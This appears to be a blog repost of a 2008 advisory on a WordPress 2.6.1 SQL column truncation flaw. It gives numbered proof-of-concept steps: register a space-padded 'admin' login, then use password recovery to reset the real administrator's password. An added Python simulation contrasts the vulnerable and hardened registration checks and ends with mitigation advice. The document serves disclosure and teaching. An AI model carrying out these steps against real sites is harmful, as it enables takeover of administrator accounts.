Wednesday, September 10, 2008
WordPress SQL Column Truncation Vulnerability (PoC)
A vulnerability in the way WordPress handles new user registration allows an attacker to create a duplicate 'admin' account whose email address is set to a value different from the real administrator's. The duplicate is then combined with the password recovery mechanism to reset the password of the true 'admin' account.
Vulnerable Systems:
* WordPress version 2.6.1
Exploit:
1. Go to URL: server.com/wp-login.php?action=register
2. Register as:
login: admin[55 spaces]x (the string 'admin', followed by 55 space characters, then 'x')
email: your email
Now a duplicate 'admin' account exists in the database
3. Go to URL: server.com/wp-login.php?action=lostpassword
4. Write your email into field and submit this form
5. Check your email and go to reset confirmation link
6. The admin's password is changed, but the new password is sent to the real admin's email address
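The steps above rely on two database behaviours: a non-strict MySQL server silently truncates an over-long value to the column width on INSERT, and PAD SPACE collations ignore trailing spaces when comparing strings, so the stored 'admin' followed by 55 spaces compares equal to 'admin'. The following simulation is an added example written for this page, not code from WordPress or from irk4z; it assumes a 60-character user_login column (the column width is an assumption made for the example) and models the uniqueness check in a vulnerable registration routine next to a hardened one that normalises and length-checks the login before comparing it the way the database will.

```python
"""Simulation of the column-truncation flaw behind the WordPress 2.6.1
registration bug, next to a hardened registration check (added example)."""

# Assumed column width for user_login; chosen for this example only.
USER_LOGIN_WIDTH = 60


def mysql_pad_space_equal(a: str, b: str) -> bool:
    """MySQL CHAR/VARCHAR comparison under PAD SPACE collations ignores
    trailing spaces, so 'admin' and 'admin   ' compare equal."""
    return a.rstrip(" ") == b.rstrip(" ")


class UserTable:
    """Tiny in-memory stand-in for a users table on a non-strict MySQL
    server, which cuts over-long values to the column width without error."""

    def __init__(self):
        self.rows = []  # each row: {"user_login": ..., "user_email": ...}

    def insert(self, login: str, email: str) -> None:
        # Non-strict sql_mode: silent truncation instead of an error.
        self.rows.append({"user_login": login[:USER_LOGIN_WIDTH],
                          "user_email": email})

    def find_by_login(self, login: str):
        """WHERE user_login = %s with PAD SPACE semantics; first match wins,
        which is why a padded duplicate can resolve to the real account."""
        for row in self.rows:
            if mysql_pad_space_equal(row["user_login"], login):
                return row
        return None


def collision_count(table: UserTable, login: str) -> int:
    """How many stored rows the database would treat as equal to `login`."""
    return sum(1 for row in table.rows
               if mysql_pad_space_equal(row["user_login"], login))


def register_vulnerable(table: UserTable, login: str, email: str) -> bool:
    """Uniqueness is checked on the untruncated string in application code:
    'admin' + 55 spaces + 'x' is not byte-equal to 'admin', so the insert
    proceeds, and the database then truncates it to 'admin' + 55 spaces."""
    if any(row["user_login"] == login for row in table.rows):
        return False
    table.insert(login, email)
    return True


def register_hardened(table: UserTable, login: str, email: str) -> bool:
    """Reject any login that storage would alter or that collides with an
    existing login under the database's own comparison rules."""
    canonical = login.strip()
    if not canonical or canonical != login:
        return False  # leading/trailing whitespace would be lost or padded
    if len(canonical) > USER_LOGIN_WIDTH:
        return False  # would be silently truncated by a non-strict server
    if table.find_by_login(canonical) is not None:
        return False  # duplicate under PAD SPACE comparison
    table.insert(canonical, email)
    return True


if __name__ == "__main__":
    # Constructed sample data: one real administrator and the crafted login
    # from the advisory (5 + 55 + 1 = 61 characters).
    crafted = "admin" + " " * 55 + "x"
    for name, register in (("vulnerable", register_vulnerable),
                           ("hardened", register_hardened)):
        table = UserTable()
        table.insert("admin", "admin@example.invalid")
        accepted = register(table, crafted, "other@example.invalid")
        print(f"{name}: accepted={accepted}, "
              f"rows equal to 'admin'={collision_count(table, 'admin')}")
```

In the vulnerable path the table ends up with two rows the database considers equal to 'admin', which is exactly the condition the lost-password flow then stumbles over; the hardened path refuses the crafted login because its length exceeds the column width, and would equally refuse a login that differs from an existing one only by trailing spaces. The same principles apply in production: run MySQL in strict mode so truncation is an error rather than a silent edit, enforce the column's length limit in the application before any uniqueness check, and perform the uniqueness check with the same comparison the database uses.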
Additional Information:
The information has been provided by irk4z.
The original article can be found at: http://irk4z.wordpress.com/